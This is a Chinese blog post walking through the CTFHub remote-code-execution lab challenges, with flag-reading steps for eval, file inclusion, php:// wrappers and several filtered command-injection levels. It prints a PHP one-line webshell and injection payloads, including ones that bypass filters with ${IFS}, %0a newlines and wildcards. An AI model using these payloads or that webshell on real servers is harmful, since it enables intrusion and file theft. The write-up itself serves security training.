CTFHub(RCE)

最新推荐文章于 2024-07-28 21:40:32 发布
最新推荐文章于 2024-07-28 21:40:32 发布
阅读量1.5k 收藏 7
点赞数 1
分类专栏: web安全 文章标签: php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cxiaodi/article/details/124629759
版权

eval执行

请添加图片描述
思路分析
单纯的一道RCE板子题,解决方法很多。
1.可以直接用蚁剑链接实现RCE
2.这里介绍手工RCE的相关技巧
3.?cmd=system(“ls /”); //查看根目录下的文件
请添加图片描述发现根目录显得flag文件
4.?cmd=system(“tac /flag_20116”); //得到flag

文件包含

请添加图片描述
思路分析
1.首先看到题目提示,shell.txt。
2.打开后发现是一个典型的一句话木马。

<?php eval($_REQUEST['ctfhub']);?>

3.结合提示,考虑包含shell.txt文件执行一句话木马实现RCE。
4.?file=shell.txt&ctfhub=system(“ls”);
5.接下来的操作和上题相似。

php://input

请添加图片描述1.根据题目提示,考虑php伪协议中的php://input
2.php://input可以获得POST的输入流
3.根据分析构造payload
请添加图片描述

注意:一定是POST方式的请求,而且发送的请求是PHP代码格式,参考一句话木马。
请添加图片描述4.在回显信息里看到flag文件,后续实现与之前题目类似。

读取源代码

请添加图片描述

思路分析
根据题目提示,考虑php://filter/读取源代码
payload:?file=php://filter/convert.base64-encode/resource=/flag
请添加图片描述将base64解码后得到flag

命令注入

请添加图片描述
思路分析
主要考察管道运算符的使用。
1.payload:127.0.0.1||ls
实现RCE,后续操作和之前题目类似

过滤cat

请添加图片描述
思路分析
cat命令被过滤,我们考虑其他的命令读取flag
payload1:127.0.0.1||tac flag_4646633119924.php
payload2:127.0.0.1||nl flag_4646633119924.php
payload3:127.0.0.1||grep ctfhub flag_4646633119924.php

过滤空格

请添加图片描述过滤空格的绕过方法:
在这里插入图片描述

payload1:tac%24{IFS}flag_12443322596965.php
payload2:tac%24IFS$1flag_12443322596965.php

过滤目录分隔符

请添加图片描述

思路分析
首先查看目录:127.0.0.1||ls
请添加图片描述发现flag文件,因为过滤了 / 无法直接通过127.0.0.1||tac /flag_is_here读取flag文件。
考虑堆叠命令执行:127.0.0.1||cd flag_is_here;ls
请添加图片描述读取flag 127.0.0.1||cd flag_is_here;tac flag_118743114030216.php

过滤运算符

请添加图片描述
思路分析
1.过滤了运算符,考虑使用分号绕过
2.127.0.0.1;ls
3.127.0.0.1;tac flag_1071124039192.php读取flag

综合过滤

请添加图片描述

思路分析
1.看大所有的管道符都被过滤,考虑使用%0a绕过(保险起见,建议在浏览器url当中修改)127.0.0.1%0Als。
2.发现敏感文件
请添加图片描述3.查看文件夹内的文件
127.0.0.1%0Als${IFS}fla?_is_here
根据之前的经验,绕过空格,用统配符绕过对flag的过滤
请添加图片描述4.发现敏感文件

(payload打不上)
请添加图片描述完结撒花
总而言之,ctfhub内的题目较为基础和简单,对小白比较友好。

cl1mb3r
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFHub远程执行RCE
m0_57379855的博客
03-17 1281
CTFHub远程执行RCEeval执行命令注入过滤cat过滤空格过滤目录分隔符过滤运算符综合过滤练习文件包含php://input远程包含读取源代码 eval执行 命令注入 127.0.0.1;cat 121931294031970.php 127.0.0.1;cat 121931294031970.php|base64 获得flag 过滤cat 其他查看文件的命令 127.0.0.1;ls 127.0.0.1;less flag_198392751413959.php|base
CTFHubRCE - 文件包含
cx_sam的博客
08-07 1723
CTF WEB RCE 文件包含
CTFHub----RCE
qq_44418229的博客
06-09 558
CTFHub----RCE
CTFHub】文件上传漏洞详解!
最新发布
muyuchen110的博客
07-28 991
又称一句话木马。WebShell就是以网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。 WebShell根据不同的语言分为:ASP木马、PHP木马、JSP木马(上传解析类型取决于网站服务端编写语言类),该类木马利用脚本语言中 可以执行系统命令、代码命令的函数 进行文件读取、命令执行、代码执行等功能。一旦将Webshell上传到服务器被脚本引擎解析,攻击者就可以实现控制获取到网站服务器的权限。 文件
ctfhub RCE
2202_75317918的博客
01-27 1003
ctfhub rce
CTFHub-rce
CN天狼
02-19 1366
CTFHub-rce
CTFHub:Rce
2301_80911344的博客
04-06 1148
RCE,即远程代码执行(Remote Code Execution),是指攻击者通过网络向目标计算机发送恶意指令或代码,成功地在目标计算机上远程执行这些指令或代码的能力。RCE是一种严重的安全漏洞,因为它允许攻击者在没有物理接触或认证的情况下控制另一台计算机。获取系统的控制权限。改变或破坏数据。启动或终止进程。在受影响的系统上安装恶意软件。监视用户行为或窃取敏感信息。因为RCE能够提供如此高级的控制权限,所以这类漏洞通常被认为是非常严重的,并且在被发现后应该立即修补。
ctfhub rce
09-01
你想了解关于 CTFHubRCE(远程命令执行)相关内容吗?CTFHub 是一个针对CTF(Capture The Flag)竞赛的学习平台,而RCE是一种常见的漏洞类型之一。在CTFHub上,你可以学习如何发现和利用RCE漏洞来获取系统权限。...
CTFhub RCE 命令注入部分
qq_41497476的博客
07-01 1251
这种题其实已经比较熟悉了,使用 |,&&,;等分隔符对前面ping的内容进行隔断,然后执行自己的命令 任意值;ls 发现了除了目录下除了index.php外还有另一个php文件 输入 127.0.0.0;cat 21701615624125.php 发现确实多了个反馈的参数,但是看不到值,很疑惑后面知道了,这是因为cat命令反馈的值无法直接显示 这时有两个方法,一是直接查看源码 源码里是能看到的 第二个方法是直接把命令改为 127.0.0.1;cat 27712282015742.php.
CTFHub-Web-RCE-eval执行题目解析
weixin_46168073的博客
11-15 1350
一、启动场景 点击web 点击RCE 点击eval执行。 开启题目,启动场景。注册会送1000个币,做一个题目消耗30,做完奖励100还是50,总之完全不用担心币的问题。 启动之后会出现一个链接,我们点击。 二、解题过程 这里会出现PHP代码。 我们使用蚁剑 。(安装之类的我会单独写一篇文章) 右键--->添加数据。 把URL复制到蚁剑,密码cmd 然后点击添加。 可以看到我们添加数据成功。 双击进...
CTFhub-RCE
weixin_51706044的博客
06-01 714
文章目录一、命令注入过滤cat过滤空格 一、命令注入 既然提示输入IP让我们输入本地试试 127.01.01.1 得到显示后,尝试得到该路径下文件 127.01.01.1&ls 获取文件内容信息 127.01.01.1&cat 120731029228103.php 没有结果,这里可能是文件中包含特殊符号,使用管道运行base64加密内容 127.01.01.1&cat *.php | base64 尝试base64解密 这里还有第二种方法,利用命令执行写入一句
CTFHUB-RCE
cainiao17441898的博客
03-14 343
eval执行 查看源码后发现。让把命令赋值给cmd然后执行 先看一下根目录下有什么,命令:?cmd=system(‘ls’); 再回到上一级看看。发现了flag 打开flag就行了。
CTFHub
weixin_65852275的博客
04-18 875
备份文件下载 前言:CTF(C apture T he F lag,夺旗赛)CTF 的前身是传统黑客之间的网络技术比拼游戏,起源于 1996 年第四届 DEFCON,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。 CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。为了方便称呼,我们把这样的内容称之
CTFHub 技能树rce
weixin_63231007的博客
05-18 1201
前言 最近临近期末考试了,所以打算抽取时间来复习一下高数,线代,不然就要挂科了😭 后面难一些的地方后面再继续练习学习。但是学习也不能停搁,周六学校的战队也要进行纳新面试了,因此那就借CTFHub技能树,综合做一下刚开始学习时的一些基础漏洞,也算是回顾复习一下🐱‍👤 (1) eval执行 eval()函数 eval()函数中的eval是evaluate的简称,这个函数的作用就是把一段字符串当作PHP语句来执行 <?php if (isset($_REQUEST['cmd'...
CTFHUBRCE(特详解)
小宇的web博客
06-15 3722
CTFHUBRCE 1.eval执行 1.先看一下靶机环境 2.先看一下php代码,这里要求将命令赋值给cmd然后执行 先看一下根目录文件/?cmd=system(“ls”); 这里的分号不能省略 没有有用的文件。查看上一级的文件夹/?cmd=system(“ls %20/”); 3.这里在进行抓取flag片段/?cmd=system(“cat%20/flag_29475”); 2.文件包含 1.先看靶机环境,点击shell会出现以下的页面,然后使用火狐的hackbar来进行postdata的注入
CTFHub 技能树-- RCE(详解)
m0_62879498的博客
02-20 5617
CTFHubRCE RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统 eval执行文件 查看一开始的源代码: <?php if(isset($_REQUEST['cmd'])){ eval($_REQUEST['cmd']); } else{ highlight_file(__FILE__); } ?> php函数意思是: 是否由变量cmd 如果有,就执行eval($_REQUEST['cmd
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值